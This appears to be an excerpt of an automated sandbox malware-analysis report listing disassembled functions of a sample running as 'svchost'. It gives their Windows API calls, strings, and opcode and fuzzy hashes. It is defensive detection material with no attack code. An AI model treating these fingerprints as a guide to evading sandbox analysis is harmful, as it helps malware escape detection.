                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9c3e59d7111fbfd60fa31e0e7ab7503243b528996f8bbda671db8ea8675e6c52
                                                            • Instruction ID: b92b4b10885da46b1e8dfed69e8ec6b6a894b21c4b8a50d6173d8bfaa8f7a404
                                                            • Opcode Fuzzy Hash: 9c3e59d7111fbfd60fa31e0e7ab7503243b528996f8bbda671db8ea8675e6c52
                                                            • Instruction Fuzzy Hash: 63A011F22A800EBC3008A200AE02C3B020CF0C0B20330882EF822C0280A88008000833
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E3FC
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 61034cdf9d4fb17fd5bc8d959680bb2cd4b457ed0ca6121de79c07e79c56aefc
                                                            • Instruction ID: b92b4b10885da46b1e8dfed69e8ec6b6a894b21c4b8a50d6173d8bfaa8f7a404
                                                            • Opcode Fuzzy Hash: 61034cdf9d4fb17fd5bc8d959680bb2cd4b457ed0ca6121de79c07e79c56aefc
                                                            • Instruction Fuzzy Hash: 63A011F22A800EBC3008A200AE02C3B020CF0C0B20330882EF822C0280A88008000833
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E3FC
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a289c3d8197aae903abc27f709292583398d77874bb93d8cc444d240dc5c0054
                                                            • Instruction ID: b92b4b10885da46b1e8dfed69e8ec6b6a894b21c4b8a50d6173d8bfaa8f7a404
                                                            • Opcode Fuzzy Hash: a289c3d8197aae903abc27f709292583398d77874bb93d8cc444d240dc5c0054
                                                            • Instruction Fuzzy Hash: 63A011F22A800EBC3008A200AE02C3B020CF0C0B20330882EF822C0280A88008000833
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E580
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 943daba0d88584d1d730b422957299fbd95d227320542824fc54602ff8491474
                                                            • Instruction ID: 49c1a9886849f05b6f5ee5815398b34c8733c477ff90c635af98f47d9dde8737
                                                            • Opcode Fuzzy Hash: 943daba0d88584d1d730b422957299fbd95d227320542824fc54602ff8491474
                                                            • Instruction Fuzzy Hash: 75A011C22AA00EBC300822A2AC02C3B020CF0C0B283328A2EF822C8080B88008000832
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E580
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a3c3279b0ad929ed8701d673dbbab5be3969a9918aaf814005e0713197c9894c
                                                            • Instruction ID: 49c1a9886849f05b6f5ee5815398b34c8733c477ff90c635af98f47d9dde8737
                                                            • Opcode Fuzzy Hash: a3c3279b0ad929ed8701d673dbbab5be3969a9918aaf814005e0713197c9894c
                                                            • Instruction Fuzzy Hash: 75A011C22AA00EBC300822A2AC02C3B020CF0C0B283328A2EF822C8080B88008000832
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E51F
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a069fcc1d1901cda5f15bbf55283ef01ed49b09bb7a38408d2330193d73058df
                                                            • Instruction ID: 9b65f05439e2b89f98e900b85efad25199d4bfa4f3599e855163d97914f41527
                                                            • Opcode Fuzzy Hash: a069fcc1d1901cda5f15bbf55283ef01ed49b09bb7a38408d2330193d73058df
                                                            • Instruction Fuzzy Hash: 79A011C2AA800EBC3808220AAC02C3B820CF8C2F28332882EF823C0080A8800C000832
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E51F
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9bc2b376a085bd481e8fb99e3cb3e2403279847747658cab80fb76d0af40457c
                                                            • Instruction ID: 9b65f05439e2b89f98e900b85efad25199d4bfa4f3599e855163d97914f41527
                                                            • Opcode Fuzzy Hash: 9bc2b376a085bd481e8fb99e3cb3e2403279847747658cab80fb76d0af40457c
                                                            • Instruction Fuzzy Hash: 79A011C2AA800EBC3808220AAC02C3B820CF8C2F28332882EF823C0080A8800C000832
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E51F
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e3cecb83e175d27ad2bc9faf7fcd77bf918a088904ab6fdd9f50639cf193ec54
                                                            • Instruction ID: 9b65f05439e2b89f98e900b85efad25199d4bfa4f3599e855163d97914f41527
                                                            • Opcode Fuzzy Hash: e3cecb83e175d27ad2bc9faf7fcd77bf918a088904ab6fdd9f50639cf193ec54
                                                            • Instruction Fuzzy Hash: 79A011C2AA800EBC3808220AAC02C3B820CF8C2F28332882EF823C0080A8800C000832
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E51F
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 0ca279345eb0f2544403a33ce81a7449eac0e51b18a20c1d49c57a26a78c4f55
                                                            • Instruction ID: 9b65f05439e2b89f98e900b85efad25199d4bfa4f3599e855163d97914f41527
                                                            • Opcode Fuzzy Hash: 0ca279345eb0f2544403a33ce81a7449eac0e51b18a20c1d49c57a26a78c4f55
                                                            • Instruction Fuzzy Hash: 79A011C2AA800EBC3808220AAC02C3B820CF8C2F28332882EF823C0080A8800C000832
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E580
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 84a9e2b327ebcfce4bcaa4c9432815c1c683ed4d101f0c4ff43fe2b28043714b
                                                            • Instruction ID: f0e8517d97f41a4261e15e6800968a8a98169e403f8483ec6dc30b4aac76708f
                                                            • Opcode Fuzzy Hash: 84a9e2b327ebcfce4bcaa4c9432815c1c683ed4d101f0c4ff43fe2b28043714b
                                                            • Instruction Fuzzy Hash: 31A011C22AA00C3C300822A2AC02C3B020CF0E0B2A332822EF822C8080B88008000832
                                                            APIs
                                                            • SetEndOfFile.KERNELBASE(?,0083903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00839F0C
                                                            Similarity
                                                            • API ID: File
                                                            • String ID:
                                                            • API String ID: 749574446-0
                                                            • Opcode ID: 862dc9ae8f9bf4126cd2852867814ddfd4c2045781b601a343c9fc93f7c83f40
                                                            • Instruction ID: c5b28edcaec3ba7c4b372110cff37c3d4b95dbfc4fd409fea81b332aba6af3a8
                                                            • Opcode Fuzzy Hash: 862dc9ae8f9bf4126cd2852867814ddfd4c2045781b601a343c9fc93f7c83f40
                                                            • Instruction Fuzzy Hash: 53A01230044409478D011730CA0400C3710F7107C430111949006CA061C712440B8601
                                                            APIs
                                                            • SetCurrentDirectoryW.KERNELBASE(?,0084AE72,C:\Users\user\Desktop,00000000,0087946A,00000006), ref: 0084AC08
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID:
                                                            • API String ID: 1611563598-0
                                                            • Opcode ID: b40160c2743cb4c49d93de3126cf8cbd5f8bf5a17706182cbebbc3f2d4efed3e
                                                            • Instruction ID: 54401dc15cc5cf65439bd5b15ae6f70e67ae274182de7320dcaa093d3f621457
                                                            • Opcode Fuzzy Hash: b40160c2743cb4c49d93de3126cf8cbd5f8bf5a17706182cbebbc3f2d4efed3e
                                                            • Instruction Fuzzy Hash: 15A011302002008BA2000B328F0AA0EBAAABFA2B00F02C028B00080030CB30C820AA00
                                                            APIs
                                                            • CloseHandle.KERNELBASE(000000FF,?,?,008395D6,?,?,?,?,?,00862641,000000FF), ref: 0083963B
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            APIs
                                                              • Part of subcall function 00831316: GetDlgItem.USER32(00000000,00003021), ref: 0083135A
                                                              • Part of subcall function 00831316: SetWindowTextW.USER32(00000000,008635F4), ref: 00831370
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0084C2B1
                                                            • EndDialog.USER32(?,00000006), ref: 0084C2C4
                                                            • GetDlgItem.USER32(?,0000006C), ref: 0084C2E0
                                                            • SetFocus.USER32(00000000), ref: 0084C2E7
                                                            • SetDlgItemTextW.USER32(?,00000065,?), ref: 0084C321
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0084C358
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0084C36E
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0084C38C
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0084C39C
                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0084C3B8
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0084C3D4
                                                            • _swprintf.LIBCMT ref: 0084C404
                                                              • Part of subcall function 00834092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008340A5
                                                            • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0084C417
                                                            • FindClose.KERNEL32(00000000), ref: 0084C41E
                                                            • _swprintf.LIBCMT ref: 0084C477
                                                            • SetDlgItemTextW.USER32(?,00000068,?), ref: 0084C48A
                                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0084C4A7
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0084C4C7
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0084C4D7
                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0084C4F1
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0084C509
                                                            • _swprintf.LIBCMT ref: 0084C535
                                                            • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0084C548
                                                            • _swprintf.LIBCMT ref: 0084C59C
                                                            • SetDlgItemTextW.USER32(?,00000069,?), ref: 0084C5AF
                                                              • Part of subcall function 0084AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0084AF35
                                                              • Part of subcall function 0084AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0086E72C,?,?), ref: 0084AF84
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                            • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                            • API String ID: 797121971-1840816070
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00836FAA
                                                            • _wcslen.LIBCMT ref: 00837013
                                                            • _wcslen.LIBCMT ref: 00837084
                                                              • Part of subcall function 00837A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00837AAB
                                                              • Part of subcall function 00837A9C: GetLastError.KERNEL32 ref: 00837AF1
                                                              • Part of subcall function 00837A9C: CloseHandle.KERNEL32(?), ref: 00837B00
                                                              • Part of subcall function 0083A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0083977F,?,?,008395CF,?,?,?,?,?,00862641,000000FF), ref: 0083A1F1
                                                              • Part of subcall function 0083A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0083977F,?,?,008395CF,?,?,?,?,?,00862641), ref: 0083A21F
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00837139
                                                            • CloseHandle.KERNEL32(00000000), ref: 00837155
                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00837298
                                                              • Part of subcall function 00839DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,008373BC,?,?,?,00000000), ref: 00839DBC
                                                              • Part of subcall function 00839DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00839E70
                                                              • Part of subcall function 00839620: CloseHandle.KERNELBASE(000000FF,?,?,008395D6,?,?,?,?,?,00862641,000000FF), ref: 0083963B
                                                              • Part of subcall function 0083A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0083A325,?,?,?,0083A175,?,00000001,00000000,?,?), ref: 0083A501
                                                              • Part of subcall function 0083A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0083A325,?,?,?,0083A175,?,00000001,00000000,?,?), ref: 0083A532
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 3983180755-3508440684
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0084F844
                                                            • IsDebuggerPresent.KERNEL32 ref: 0084F910
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0084F930
                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0084F93A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                            • String ID:
                                                            • API String ID: 254469556-0
                                                            APIs
                                                            • VirtualQuery.KERNEL32(80000000,0084E5E8,0000001C,0084E7DD,00000000,?,?,?,?,?,?,?,0084E5E8,00000004,00891CEC,0084E86D), ref: 0084E6B4
                                                            • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0084E5E8,00000004,00891CEC,0084E86D), ref: 0084E6CF
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: InfoQuerySystemVirtual
                                                            • String ID: D
                                                            • API String ID: 401686933-2746444292
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00858FB5
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00858FBF
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00858FCC
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .
                                                            • API String ID: 0-248832578
                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0084AF35
                                                            • GetNumberFormatW.KERNEL32(00000400,00000000,?,0086E72C,?,?), ref: 0084AF84
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: FormatInfoLocaleNumber
                                                            • String ID:
                                                            • API String ID: 2169056816-0
                                                            APIs
                                                            • GetLastError.KERNEL32(00836DDF,00000000,00000400), ref: 00836C74
                                                            • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00836C95
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0084F66A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: FeaturePresentProcessor
                                                            • String ID:
                                                            • API String ID: 2325560087-0
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 0083B16B
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Version
                                                            • String ID:
                                                            • API String ID: 1889659487-0
                                                            • Opcode ID: 9ac2a7d07b4aba6bca0af5197b2af2c11bf1ef9b6ced40d3dc1887253c42bbf8
                                                            • Instruction ID: f91fbe4f2b5b87430bb891ef96b1a1707e30a8fe1cd724a5536261648e144923
                                                            • Opcode Fuzzy Hash: 9ac2a7d07b4aba6bca0af5197b2af2c11bf1ef9b6ced40d3dc1887253c42bbf8
                                                            • Instruction Fuzzy Hash: 2CF03AB8E00A088FDB18CB18ECAA6D973F1FB98315F114295D61993794D7B0E9C49EA1
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0084F3A5), ref: 0084F9DA
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: e6c37ad3c7680b10628dcf2d26584b145e6dfa284c666a16e5832c67d38ebba3
                                                            • Instruction ID: 8c53d6f3e3e7015fa864e53291e0ede59f186ed84ed2770a425d538cc232be6d
                                                            • Opcode Fuzzy Hash: e6c37ad3c7680b10628dcf2d26584b145e6dfa284c666a16e5832c67d38ebba3
                                                            • Instruction Fuzzy Hash:
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID:
                                                            • API String ID: 54951025-0
                                                            • Opcode ID: 3795f6bc234da431ce41f7d9c1119c6b54e3022c1398b6f1223acfeba25bcf6e
